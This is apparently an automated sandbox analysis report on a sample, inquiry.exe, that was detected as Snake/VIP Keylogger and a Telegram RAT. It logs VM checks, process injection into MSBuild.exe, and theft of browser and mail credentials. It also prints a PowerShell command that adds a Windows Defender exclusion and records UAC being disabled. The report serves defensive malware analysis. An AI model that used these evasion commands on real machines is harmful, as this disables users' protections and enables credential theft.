Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 592484	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 592375	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 592266	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 592156	Jump to behavior

Source: Amcache.hve.15.dr	Binary or memory string: VMware
Source: MSBuild.exe, 0000000A.00000002.3763031481.0000000003BF4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: MSBuild.exe, 0000000A.00000002.3763031481.0000000003BF4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: MSBuild.exe, 0000000A.00000002.3763031481.0000000003BF4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: inquiry.exe, 00000002.00000002.1511673057.000001F800340000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: MSBuild.exe, 0000000A.00000002.3763031481.0000000003BF4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696492231s
Source: MSBuild.exe, 0000000A.00000002.3763031481.0000000003BF4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696492231
Source: Amcache.hve.15.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: MSBuild.exe, 0000000A.00000002.3763031481.0000000003BF4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: MSBuild.exe, 0000000A.00000002.3763031481.0000000003BF4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: inquiry.exe, 00000002.00000002.1511673057.000001F800340000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\'C:\WINDOWS\system32\drivers\vmmouse.sys&C:\WINDOWS\system32\drivers\vmhgfs.sys
Source: inquiry.exe, 00000002.00000002.1511673057.000001F800340000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMWARE
Source: MSBuild.exe, 0000000A.00000002.3763031481.0000000003BF4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: MSBuild.exe, 0000000A.00000002.3763031481.0000000003BF4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: Amcache.hve.15.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: MSBuild.exe, 0000000A.00000002.3763031481.0000000003BF4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696492231f
Source: Amcache.hve.15.dr	Binary or memory string: vmci.sys
Source: MSBuild.exe, 0000000A.00000002.3763031481.0000000003BF4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696492231
Source: inquiry.exe, 00000002.00000002.1511673057.000001F800340000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\WINDOWS\system32\drivers\vmmouse.sys
Source: inquiry.exe, 00000002.00000002.1511673057.000001F800340000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware
Source: MSBuild.exe, 0000000A.00000002.3763031481.0000000003BF4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: MSBuild.exe, 0000000A.00000002.3763031481.0000000003BF4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: inquiry.exe, 00000002.00000002.1511673057.000001F800340000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\WINDOWS\system32\drivers\vmhgfs.sys
Source: MSBuild.exe, 0000000A.00000002.3763031481.0000000003BF4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696492231o
Source: Amcache.hve.15.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.15.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.15.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.15.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: MSBuild.exe, 0000000A.00000002.3763031481.0000000003BF4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: Amcache.hve.15.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.15.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.15.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: inquiry.exe, 00000002.00000002.1511673057.000001F800340000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: noValueButYesKey)C:\WINDOWS\system32\drivers\VBoxMouse.sys
Source: MSBuild.exe, 0000000A.00000002.3763031481.0000000003BF4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: inquiry.exe, 00000002.00000002.1511673057.000001F800340000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\WINDOWS\system32\drivers\VBoxMouse.sys
Source: Amcache.hve.15.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.15.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.15.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: MSBuild.exe, 0000000A.00000002.3763031481.0000000003BF4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: Amcache.hve.15.dr	Binary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
Source: MSBuild.exe, 0000000A.00000002.3763031481.0000000003BF4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: MSBuild.exe, 0000000A.00000002.3763031481.0000000003BF4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: MSBuild.exe, 0000000A.00000002.3763031481.0000000003BF4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
Source: Amcache.hve.15.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: MSBuild.exe, 0000000A.00000002.3763031481.0000000003BF4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: Amcache.hve.15.dr	Binary or memory string: VMware Virtual USB Mouse
Source: MSBuild.exe, 0000000A.00000002.3763031481.0000000003BF4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: Amcache.hve.15.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.15.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.15.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.15.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: MSBuild.exe, 0000000A.00000002.3763031481.0000000003BF4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: Amcache.hve.15.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.15.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: MSBuild.exe, 0000000A.00000002.3763031481.0000000003BF4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: MSBuild.exe, 0000000A.00000002.3763031481.0000000003BF4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: inquiry.exe, 00000002.00000002.1511673057.000001F800340000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: inquiry.exe, 00000002.00000002.1511673057.000001F800340000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware SVGA II
Source: MSBuild.exe, 0000000A.00000002.3763031481.0000000003BF4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: Amcache.hve.15.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.15.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: MSBuild.exe, 0000000A.00000002.3760638359.0000000000E76000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: MSBuild.exe, 0000000A.00000002.3763031481.0000000003BF4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696492231j
Source: MSBuild.exe, 0000000A.00000002.3763031481.0000000003BF4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: Amcache.hve.15.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.15.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: MSBuild.exe, 0000000A.00000002.3763031481.0000000003BF4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: inquiry.exe, 00000002.00000002.1511673057.000001F800340000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: Amcache.hve.15.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.15.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: MSBuild.exe, 0000000A.00000002.3763031481.0000000003BF4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: MSBuild.exe, 0000000A.00000002.3763031481.0000000003BF4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696492231\|UE

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\inquiry.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\inquiry.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 10_2_054C97B0 LdrInitializeThunk,

10_2_054C97B0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\inquiry.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: inquiry.exe, --.cs	Reference to suspicious API methods: LoadLibrary(_FBC4_FD49_065C_FBC9_06E3(_060A_FD91_FD47_FD3E._0652))
Source: inquiry.exe, --.cs	Reference to suspicious API methods: GetProcAddress(intPtr, _FBC4_FD49_065C_FBC9_06E3(_060A_FD91_FD47_FD3E._FD4B_FBBC_FDEE))
Source: inquiry.exe, --.cs	Reference to suspicious API methods: VirtualProtect(procAddress, (uint)array.ToArray().Length, 64u, out var _066A_FD4B_0619_0618)

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\inquiry.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\inquiry.exe" -Force
Source: C:\Users\user\Desktop\inquiry.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\inquiry.exe" -Force			Jump to behavior

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\inquiry.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\inquiry.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\inquiry.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\inquiry.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 402000	Jump to behavior
Source: C:\Users\user\Desktop\inquiry.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 446000	Jump to behavior
Source: C:\Users\user\Desktop\inquiry.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 448000	Jump to behavior
Source: C:\Users\user\Desktop\inquiry.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 8D4008	Jump to behavior

Source: C:\Users\user\Desktop\inquiry.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\inquiry.exe" -Force	Jump to behavior
Source: C:\Users\user\Desktop\inquiry.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"	Jump to behavior
Source: C:\Users\user\Desktop\inquiry.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"	Jump to behavior

Source: C:\Users\user\Desktop\inquiry.exe	Queries volume information: C:\Users\user\Desktop\inquiry.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\inquiry.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Disables UAC (registry)

Source: C:\Users\user\Desktop\inquiry.exe

Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUA

Jump to behavior

Source: Amcache.hve.15.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.15.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.15.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.15.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.15.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match

File source: 0000000A.00000002.3761177777.0000000002931000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 10.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.inquiry.exe.1f81013a340.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.inquiry.exe.1f8100a1f08.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.inquiry.exe.1f8100554c0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.inquiry.exe.1f81013a340.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.inquiry.exe.1f8100554c0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.3758812788.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1512122215.000001F810011000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: inquiry.exe PID: 7340, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 7860, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 10.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.inquiry.exe.1f81013a340.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.inquiry.exe.1f8100a1f08.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.inquiry.exe.1f8100554c0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.inquiry.exe.1f81013a340.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.inquiry.exe.1f8100554c0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.3761177777.0000000002B23000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3758812788.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1512122215.000001F810011000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: inquiry.exe PID: 7340, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 7860, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Source: Yara match	File source: 10.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.inquiry.exe.1f81013a340.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.inquiry.exe.1f8100a1f08.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.inquiry.exe.1f8100554c0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.inquiry.exe.1f81013a340.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.inquiry.exe.1f8100554c0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.3758812788.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1512122215.000001F810011000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: inquiry.exe PID: 7340, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 7860, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match

File source: 0000000A.00000002.3761177777.0000000002931000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 10.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.inquiry.exe.1f81013a340.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.inquiry.exe.1f8100a1f08.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.inquiry.exe.1f8100554c0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.inquiry.exe.1f81013a340.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.inquiry.exe.1f8100554c0.1.raw.unpack, type: UNPACKEDPE
